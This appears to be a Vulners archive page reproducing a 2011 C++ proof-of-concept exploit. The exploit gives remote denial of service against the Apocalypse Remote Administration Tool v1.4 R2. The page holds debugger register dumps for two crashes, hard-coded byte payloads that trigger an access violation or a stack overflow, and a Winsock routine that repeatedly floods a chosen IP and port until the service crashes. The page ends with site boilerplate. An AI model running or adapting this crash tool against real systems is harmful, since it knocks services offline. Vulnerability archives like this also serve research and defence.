Vulners
Lucene search
Apocalypse Remote Administration Tool v1.4 R2 multiple vulnerabilities
/* Apocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities
* Author: Kevin R.V <[email protected]>
* Date: 2011
* License: Totally free 8-)
*
* */
/*
Access violation when try to write in 0x000003F4
EAX 00000000
ECX 00000000
EDX 00000000
EBX 02E6CC88
ESP 00103ED0
EBP 00103F04
ESI 00000000
EDI 00458CA4 Client.00458CA4
EIP 00509AB5 Client.00509AB5
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
MM0 0.0, 1.121039e-44
MM1 +NAN 7FFDE6F4, 8.506428e+33
MM2 -9.846953e+26, -6.258335e+15
MM3 -8.745139e+07, 0.005859086
MM4 -2.466859e-33, -6.343342e-15
MM5 -1.084202e-19, 0.0
MM6 -2.466859e-33, -6.343342e-15
MM7 0.0, 0.0 */
/*
Stack overflow
EAX 034D1694
ECX 00498E00 Client.00498E00
EDX 00000690
EBX 034D1694
ESP 0003251C
EBP 00033518
ESI 021901D1
EDI 000335D8
EIP 0049A3DD Client.0049A3DD
C 1 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010203 (NO,B,NE,BE,NS,PO,GE,G)
MM0 0.0, 1.121039e-44
MM1 +NAN 7FFDE6F4, 8.506428e+33
MM2 -1.570600e-32, 5.571002e-41
MM3 -1.196440, -1.191965
MM4 -0.008783944, -1.009549
MM5 5.791298e-39, 0.0
MM6 -5.082198e-21, 0.0
MM7 -7.754818e-26, 0.0 */
#include <iostream>
#include <winsock2.h>
#define VERS "0.1"
int connected;
using namespace std;
char Access_violation[] =
{
0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x40,0x10,
0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
0x93,0xD6,0x5B,0x7F,0xA2,0xF4,0x90,0x52,0x48,0x40, 0xC1,0x88,0x2C,0x49,
0x1A,0x57,0xD2,0xDD,0x92,0x4D,0x51,0x61,0xEF,0xBE,0x40,0x5F,0x40,
0xF0,0x15,0x04,0x8F,0xDE,0xF5,0xE6,0x13,0x14,0xBC,0x2A,0x82,0x07,
0xC1,0x93,0x13,0x2C,0xD8,0x43,0x85,0x7E,0xC3,0x0C,0xDF,0xCC,0xCE,
0xCC,0xCE,0x4C,0x87,0xA5,0x19,0x13,0x9A,0x4D,0x64,0xC4,0xB2,0xEB,
0x89,0x4A,0x80,0xE2,0x05,0x3D,0x6B,0x58,0xDD,0x0E,0xC6,0x2D,0x4B,
0x07,0x89,0x2A,0xB8,0x48,0xCD,0x61,0xA4,0x03,0xD7,0x0F,0xFA,0x83,
0x43,0xB3,0x6D,0xB7,0x5D,0x52,0xEF,0x68,0x42,0x9D,0x1A,0x06,0x21,
0x7A,0x20,0x0B,0xD4,0x17,0xAA,0x60,0x59,0x96,0xC4,0x9A,0xD4,0xAC,
0x9A,0x85,0x3A,0xD3,0x14,0x1D,0xF0,0x2B,0xF0,0xA9,0x8D,0xB5,0x3F,
0x61,0x5C,0x94,0x56,0x70,0x75,0xAE,0xDB,0xF1,0x98,0x03,0x29,0x72,
0x56,0xC8,0x5C,0x53,0xD2,0x22,0xDA,0x78,0xFC,0xDA,0x31,0x00,0xFA,
0x88,0x8B,0x58,0x5E,0x2A,0x74,0x3C,0x44,0x7B,0xC3,0x5C,0x8E,0x12,
0xA5,0xB8,0x14,0x2C,0xAB,0x6A,0x0C,0xD2,0xDD,0x0F,0x4B,0xED,0xC9,
0x68,0x3A,0x4E,0x44,0xA1,0x10,0x13,0x31,0xF2,0x93,0xA2,0x9C,0x51,
0x85,0x7F,0xC3,0x86,0xAE,0x8A,0x72,0x0E,0xDD,0xB9,0x5C,0xB3,0xC0,
0xE3,0x0A,0xC5,0x8B,0xB6,0x52,0xAD,0x59,0xD4,0x95,0x62,0xC4,0xD3,
0x69,0xCE,0x22,0xFE,0x29,0x50,0x56,0x5E,0x32,0xEC,0xC1,0x52,0xD0,
0x2A,0x41,0x93,0x5C,0xA6,0x39,0x1B,0xB3,0x50,0xBB,0xFE,0xD2,0x6D,
0xF5,0x1D,0xAC,0x59,0xEA,0x26,0x68,0xA3,0x41,0x1D,0xCB,0xB4,0x2D,
0x6C,0x62,0xBB,0x45,0x5B,0x4D,0x62,0xD2,0x3A,0x26,0x96,0x51,0x83,
0xB7,0x36,0xA5,0x26,0x06,0x10,0xE0,0x25,0xE2,0x53,0xEF,0xF9,0xFB,
0x63,0x6B,0x77,0x56,0xAD,0xBC,0xBF,0x94,0x09,0x00,0xF7,0x66,0xEE,
0xDD,0xDF,0x56,0x7E,0x9D,0x15,0xD6,0xB1,0x9B,0xD8,0x59,0xC4,0x1F,
0xE0,0xC3,0x99,0xF1,0x14,0x18,0x1B,0x86,0x41,0xE9,0x8A,0xE4,0xA5,
0xD0,0xC9,0xC5,0xEB,0xDB,0x36,0xF8,0xFF,0xCC,0xE7,0x8D,0xE7,0x9E,
0xFE,0x01,0xF0,0xF2,0xA8,0x97
};
char stack[] =
{
0x33,0x36,0x37,0x7C,0x78,0x01,0x8D,0x50,0xCD,0x4A,0xC3,0x00,0x10,
0x0E,0x7A,0xE8,0xC5,0xBB,0x47,0x17,0x4F,0xF6,0x90,0xB2,0xBB,0x4D,
};
int PoC(char * host, unsigned int port, unsigned int vuln)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
struct sockaddr_in local;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
local.sin_family = AF_INET;
local.sin_addr.s_addr = inet_addr(host);
local.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
{
connected = 1;
cout << ".";
for(int i = 0; i<99; i++)
{
if ( vuln == 0 )
sendto(sock, Access_violation, sizeof(Access_violation), 0, (struct sockaddr *)&local,sizeof(local));
else
sendto(sock, stack, sizeof(stack), 0, (struct sockaddr *)&local,sizeof(local));
}
PoC(host, port, vuln);
}
else
{
if ( connected )
cout << endl << endl << "[+] Congrats Apocalypse crashed!" << endl;
else
cout << endl << endl << "[-] Sorry not Apocalypse detected :(" << endl;
}
}
int main(int argc, char *argv[])
{
cout << "\nApocalypse Remote Administration Tool v1.4 R2 multiple remote denial of service vulnerabilities" VERS << endl << endl;
cout << "by Kevin R.V <[email protected]" << endl;
if ( argc < 6 )
{
cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port> -v <vuln type>" << endl << endl;
cout << "vuln list : " << endl;
cout << "0- Access violation, try to write in not allowed memory" << endl;
cout << "1- Stack overflow" << endl;
exit(-1);
}
u_short port;
char * ip;
u_short v_type = 0;
for(int i = 0; i<argc; i++)
{
if( ! strcmp(argv[i], "-h") != 0 )
ip = argv[i+1];
else if( ! strcmp(argv[i], "-p") != 0 )
port = atoi(argv[i+1]);
else if( ! strcmp(argv[i], "-v") != 0 )
v_type = atoi(argv[i+1]);
}
cout << "[+] Starting exploit" << endl << endl;
PoC(ip, port, v_type);
return 1;
}
# 0day.today [2018-03-28] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 May 2011 00:00Current
7.1High risk
Vulners AI Score7.1